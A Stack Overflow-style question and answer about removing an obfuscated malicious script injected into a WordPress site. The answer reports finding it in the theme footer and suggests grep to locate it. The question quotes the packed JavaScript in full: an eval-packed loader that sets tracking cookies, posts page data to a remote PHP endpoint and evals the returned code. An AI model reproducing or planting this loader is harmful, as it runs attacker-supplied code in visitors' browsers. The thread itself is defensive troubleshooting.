Preventing specific script from executing wordpress

Question

There is a particular malicious script loaded in the end of my wordpress site that i want to prevent from running. The function is obfuscated to avoid detection.

<script type="text/javascript">
    eval(function(p, a, c, k, e, d) {
        e = function(c) {
            return c
        };
        if (!''.replace(/^/, String)) {
            while (c--) {
                d[c] = k[c] || c
            }
            k = [function(e) {
                return d[e]
            }];
            e = function() {
                return '\\w+'
            };
            c = 1
        }
        ;
        while (c--) {
            if (k[c]) {
                p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c])
            }
        }
        return p
    }('2 15={\'51\':\'//102.61\',\'6\':\'62\',\'48\':38};23 44(){2 3;9{3=25 55("64.52")}7(11){9{3=25 55("63.52")}7(66){3=38}}5(!3&&67 50!=\'69\'){3=25 50()}42 3};23 18(28){2 6=" "+43.6;2 34=" "+28+"=";2 33=17;2 16=0;2 21=0;5(6.13>0){16=6.37(34);5(16!=-1){16+=34.13;21=6.37(";",16);5(21==-1){21=6.13}33=65(6.56(16,21))}}42(33)};23 19(28,47,24,30,31,36){43.6=28+"="+68(47)+((24)?"; 24="+24:"")+((30)?"; 30="+30:"")+((31)?"; 31="+31:"")+((36)?"; 36":"")};(23(12,46){2 22=18(12);5(22==17)22=0;2 32=18(12+\'57\');5(32==17)32=\'[]\';2 29=18(12+\'40\');5(29==17)29=\'[]\';2 3=44();3.60(\'59\',46,58);3.71("70-73","74/91-92-93-94");3.95=23(){5(3.90==4&&3.96==98){9{5(3.45.13==0)42;2 20=41.49(3.45);2 26=\'\';2 14=0;2 39=38;9{26=20[\'99\']}7(11){}9{14=20[\'100\']}7(11){}9{39=(20[\'101\']==1)}7(11){}15[\'48\']=39;5(26.13>0){2 10=25 89();10.88(10.87()+1);5(14>0){19(12+\'86\',14.53(),10.27())}9{19(12+\'85\',20[\'84\'],10.27())}7(11){}5(22==0){19(12,\'1\',10.27())}2 8=17;9{8=41.49(18(15[\'6\']+\'40\'))}7(11){}5(8==17)8=[];5(8.37(14)==-1)8[8.13]=1*14;19(15[\'6\']+\'40\',41.83(8),10.27());54.82(26)}}7(11){}}};3.81(\'80=\'+22.53()+\'&79=\'+35(54.78.77)+\'&76=\'+35(32)+\'&75=\'+35(29))})(15[\'6\'],15[\'51\']+\'/97.72\');', 10, 103, '||var|xmlhttp||if|cookie|catch|vM|try|vDate|e|sCookieName|length|iT|vXAdsObj|offset|null|getCookie|setCookie|Response|end|iStatus|function|expires|new|sCode|toUTCString|name|sMS|path|domain|sMA|setStr|search|encodeURIComponent|secure|indexOf|false|bM|_ms|JSON|return|document|getXmlHttp|responseText|sUrl|value|mobile|parse|XMLHttpRequest|url|XMLHTTP|toString|window|ActiveXObject|substring|_ma|true|POST|open|fun|xads_platf|Microsoft|Msxml2|unescape|E|typeof|escape|undefined|Content|setRequestHeader|php|type|application|ms|ma|href|location|u|s|send|eval|stringify|fp|_fp|_t|getFullYear|setYear|Date|readyState|x|www|form|urlencoded|onreadystatechange|status|g|200|c|t|m|amads'.split('|'), 0, {}))
    </script>

The script appears to call a 3rd party script loaded on another website.

Is there anyway i could block this particular script from injection or locating which plugin calls the script? I've tried turning off my plugins one by one but that hasn't fixed the problem. I'm thinking of blocking the 3rd party domain through a firewall rule server-side but that is just a temporary fix.

Sorry if i broke any "unwritten" rules, i am quite new to stackoverflow.

Answer 1

I went through all the wordpress load files to search for any suspicious scripts that may be running. I found it in the footer of my theme folder.

If someone reading this is facing the same problem, you should use developer tools to find out which function calls the pop-up / malicious script.

After you find the malicious script injection code you should ssh to the server and use grep to find out which .php file executes it.

for example:

grep -r -H "code" *

This will make grep look recursively (-r option) and provide the result in a human-readable format (-H option) for the string “code” in all (*) files under the current working directory.